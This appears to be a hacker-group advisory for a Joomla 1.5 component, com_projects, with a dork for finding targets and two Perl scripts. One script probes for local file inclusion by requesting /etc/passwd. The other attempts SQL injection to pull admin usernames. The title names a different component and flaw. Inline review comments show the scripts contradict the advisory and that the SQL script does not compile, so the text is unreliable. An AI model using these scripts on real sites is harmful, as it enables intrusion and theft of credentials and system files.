=========================================================

Joomla  Component com_projects LFI & SQL Vulnerability

=========================================================



[+]Title        : Joomla  Component com_calendrier RFI Vulnerability

[+]Author       : jos_ali_joe

[+]Contact      : josalijoe@yahoo.com

[+]Home         : http://josalijoe.wordpress.com/





######################################################################## 



Dork		: inurl:index.php?option="com_projects"



######################################################################## 



[ Software Information ]



########################################################################

[+] Vendor : http://www.codegravity.com/

[+] Download : http://www.joomla.org/download.html

[+] version : Joomla 1.5

[+] Vulnerability : LFI and SQL Vulnerability

[+] Dork : com_projects

########################################################################



[+] Exploit: LFI



====================================================================================

http://localhost/index.php?option=com_projects&controller=[ LFI ]

====================================================================================

# LFI probe: sends a single GET for a path-traversal URL built from the base
# URL given on the command line and reports "vuln" if any line of the HTTP
# response begins with "root". No `use strict`/`use warnings`; $web, $iny and
# $doc are package globals.
use LWP::UserAgent;

use HTTP::Request;

use LWP::Simple;   # imported but unused below; the request goes through LWP::UserAgent



# Banner.
print "\t\t########################################################\n\n";

print "\t\t#    Joomla  Component com_projects LFI Vulnerability  #\n\n";

print "\t\t#                        by jos_ali_joe                #\n\n";

print "\t\t########################################################\n\n";





# Usage text when no base URL was supplied. This branch does not call exit;
# the script simply falls off the end.
if (!$ARGV[0])

{

print "Usage: perl idc.pl [HOST]\n";

print "Example: perl idc.pl http://localhost/LFI/\n";;

}



else

{



# Base URL as given; only a trailing newline is removed, so a missing
# trailing "/" is not repaired before $iny is concatenated below.
$web=$ARGV[0];

chomp $web;



# Traversal probe appended verbatim to the base URL. Note it targets
# agregar_info.php?tabla=..., not the index.php?option=com_projects&controller=
# vector described in the advisory header above.
$iny="agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00";



my $web1=$web.$iny;

print "$web1\n\n";

my $ua = LWP::UserAgent->new;

my $req=HTTP::Request->new(GET=>$web1);

# as_string() yields the status line and headers as well as the body, so the
# regex below is applied to the whole response, not just the page content.
$doc = $ua->request($req)->as_string;



# Oracle: some line of the response starts with "root" (/m lets ^ match at
# any line start, /i makes it case-insensitive; /o, /x and /s change nothing
# for this literal pattern). Any header or HTML line beginning with "root"
# also matches, so a "vuln" verdict can be a false positive.
if ($doc=~ /^root/moxis ){

print "Web is vuln\n";

}

else

{

print "Web is not vuln\n";

}



}



####################################################################################



[+] Exploit: SQL



====================================================================================

http://localhost/index.php?option=com_projects&view=project&id=[ SQL ]

====================================================================================



# SQL-injection "exploit" script: opens a raw TCP connection to the target on
# port 80, hand-writes one HTTP/1.1 GET for the com_projects view URL, and
# scans the response for "username:...pass". No `use strict`/`use warnings`;
# all variables are package globals.
use IO::Socket;

# Usage text and exit when no target was given.
if(@ARGV < 1){

print "

[========================================================================

[//   Joomla Component com_projects SQL Injection Exploit

[//                   Usage: idc.pl [target]

[//                   Example: idc.pl localhost.com

[//                   Vuln&Exp : jos_ali_joe

[========================================================================

";

exit();

}

#Local variables

# Target host; a leading "http://" is stripped. The /e flag evaluates the
# (empty) replacement as Perl code, which still yields an empty string, so
# it is a no-op here.
$server = $ARGV[0];

$server =~ s/(http:\/\/)//eg;

$host = "http://".$server;

$port = "80";

$file = "/index.php?option=com_projects&view=project&id=";

 

# Joomla install directory, read interactively. chop() removes the last
# character unconditionally (the newline here); unlike chomp it would also
# eat a real character if the input had no trailing newline.
print "Script <DIR> : ";

$dir = <STDIN>;

chop ($dir);

 

# Typing anything containing "exit" aborts.
if ($dir =~ /exit/){

print "-- Exploit Failed[You Are Exited] \n";

exit();

}

 

# The directory must contain at least one "/"; the true branch is
# intentionally empty and only the else branch does anything.
if ($dir =~ /\//){}

else {

print "-- Exploit Failed[No DIR] \n";

exit();

 }

 

 

# Request target = $host . $dir . $file . the literal text
# "SQL Injection Exploit" (spaces left unencoded). Because $host is included,
# the GET line below carries an absolute URL rather than a path.
$target = "SQL Injection Exploit";

$target = $host.$dir.$file.$target;

 

#Writing data to socket

print "+**********************************************************************+\n";

print "+ Trying to connect: $server\n";

# Plain TCP, no TLS and no timeout; dies if the connection cannot be made.
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";

# Hand-rolled request. Lines end in "\n" rather than the "\r\n" HTTP
# requires, and the Accept value "* /*" contains a stray space.
print $socket "GET $target HTTP/1.1\n";

print $socket "Host: $server\n";

print $socket "Accept: * /*\n";

print $socket "Connection: close\n\n";

print "+ Connected!...\n";

#Getting

# Read response lines until the server closes the connection; each line
# matching "username:...pass" prints the text captured between the two
# words as the username. Nothing else in the response is reported.
while($answer = <$socket>) {

if ($answer =~ /username:(.*?)pass/){

print "+ Exploit succeed! Getting admin information.\n";

print "+ ---------------- +\n";

print "+ Username: $1\n";

}
# NOTE(review): the while loop opened above is never closed in this listing
# (the "}" above closes only the if), so the script as shown does not compile.



####################################################################################



Thanks :



./kaMtiEz – ibl13Z – Xrobot – tukulesto – R3m1ck – jundab - asickboys - Vyc0d – Yur4kha - XPanda - eL Farhatz



./ArRay – akatsuchi – K4pt3N – Gameover – antitos – yuki – pokeng – ffadill - Alecs - v3n0m - RJ45



./Kiddies – pL4nkt0n – chaer newbie – andriecom – Abu_adam – Petimati - hakz – Virgi – Anharku - a17z a.k.a maho





./Me Family ATeN4 :



./N4ck0 - Aury - TeRRenJr - Rafael - aphe-aphe 



Greets For :



./Devilzc0de crew – Kebumen Cyber – Explore Crew – Indonesian Hacker - Byroe Net - Yogyacarderlink - Hacker Newbie - Jatim Crew - Malang Cyber



My Team : ./Indonesian Coder